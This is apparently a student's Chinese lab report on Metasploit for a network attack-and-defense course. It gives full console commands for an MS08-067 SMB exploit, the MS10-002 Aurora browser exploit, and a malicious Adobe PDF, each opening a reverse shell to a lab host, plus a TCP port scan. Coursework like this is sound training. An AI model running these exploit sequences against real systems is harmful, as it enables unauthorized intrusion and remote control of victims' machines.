20192416《系统与网络攻防技术》实验六实验报告
一.实验内容及要求
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。
二、实验步骤
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
这里使用的漏洞是MS08_067
攻击步骤如下:
msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.101
msf exploit(ms08_067_netapi) > set LPORT 2416
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102
msf exploit(ms08_067_netapi) > set target 0
msf exploit(ms08_067_netapi) > exploit
过程截图:
攻击成功结果:
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
这里使用的是ms10-002
msfconsole
use exploit/windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.56.101
set LHOST 192.168.56.101
set LPORT 2416
exploit
过程截图:
在靶机浏览器上输入:http://192.168.56.101:8080/Srh3I1HvweM
2.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞
这里使用的是对Adobe的渗透攻击
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.56.101
msf exploit(adobe_cooltype_sing) > set LPORT 2416
msf exploit(adobe_cooltype_sing) > set FILENAME 2416.pdf
msf exploit(adobe_cooltype_sing) > exploit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
msf exploit(handler) > set LPORT 2416
msf exploit(handler) > exploit
将pdf文件移动至靶机内,用Adobe打开
攻击机即可获得靶机shell
2.4成功应用任何一个辅助模块
使用auxiliary模块下的tcp扫描模块
use auxiliary/scanner/portscan/tcp
set rhost 192.168.56.102
set THREADS 30
run
三、问题及解决方案
问题:在针对浏览器的攻击中找不到适合的漏洞
解决方案:确定当前的操作系统版本以及浏览器版本,选择匹配的漏洞进行实验
四、学习感悟
本次实验我们利用了Metasploit的各种模块实现了针对许多对象的攻击,但这些攻击往往都只能对特定的版本的特定对象发起攻击,因此确定对象的操作系统版本,浏览器等各种软件版本就显得至关重要了。通过本次实验,让我熟悉了Metasploit的各种模块的使用,也对在该平台上进行渗透攻击的流程有了初步了解。